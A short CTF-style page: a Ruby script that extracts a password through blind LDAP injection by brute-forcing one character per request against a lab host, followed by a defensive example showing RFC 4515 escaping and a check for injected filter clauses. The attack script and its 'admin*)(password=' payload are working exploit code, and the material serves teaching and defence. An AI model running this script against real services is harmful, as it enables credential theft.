This is a very basic script that retrieves the password of a user in a blind LDAP injection case by brute-forcing the characters one by one.
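```ruby
#!/usr/bin/env ruby
require 'net/http'

# Candidate characters tried at each position of the password
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '[email protected]{}-/()!"$%=^[]:;'.split('')
flag = ''

(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    # The search value closes the original clause and appends a password clause
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    # "TRUE CONDITION" stands for the text the page returns when the filter matches
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end
```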
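Seen from the server side, the request above only works because the `*`, `(` and `)` in `search` reach the LDAP filter unescaped. The following is an added example, not code from the original page: it applies RFC 4515 escaping to that same value. The filter template `(&(cn=...)(objectClass=person))` and all function names are assumptions, since the page does not show the server code.

```ruby
# Added defensive example. The filter template below is an assumption;
# the page only shows the client-side request.

# RFC 4515 section 3: these characters must be written as \XX in a filter value.
LDAP_ESCAPES = {
  "\\" => '\5c', '*' => '\2a', '(' => '\28', ')' => '\29', "\x00" => '\00'
}.freeze

def escape_ldap_value(value)
  value.to_s.gsub(/[\\*()\x00]/, LDAP_ESCAPES)
end

# Vulnerable form: user input is concatenated straight into the filter.
def unsafe_filter(search)
  "(&(cn=#{search})(objectClass=person))"
end

# Hardened form: the value is escaped, so it cannot close or open a clause.
def safe_filter(search)
  "(&(cn=#{escape_ldap_value(search)})(objectClass=person))"
end

# Counts the clauses directly inside the outer (&...) group.
# The template defines two; a third means the input changed the filter's shape.
def clause_count(filter)
  depth = 0
  count = 0
  filter.each_char do |c|
    if c == '('
      depth += 1
      count += 1 if depth == 2
    elsif c == ')'
      depth -= 1
    end
  end
  count
end

# Constructed sample: the search value from the request on this page,
# with "a" as the guessed character.
payload = 'admin*)(password=a'
puts unsafe_filter(payload)   # three clauses: a password test was injected
puts safe_filter(payload)     # two clauses: payload is a literal cn value
```

With escaping in place every guess compares `cn` against the literal string, so the response no longer depends on the password attribute.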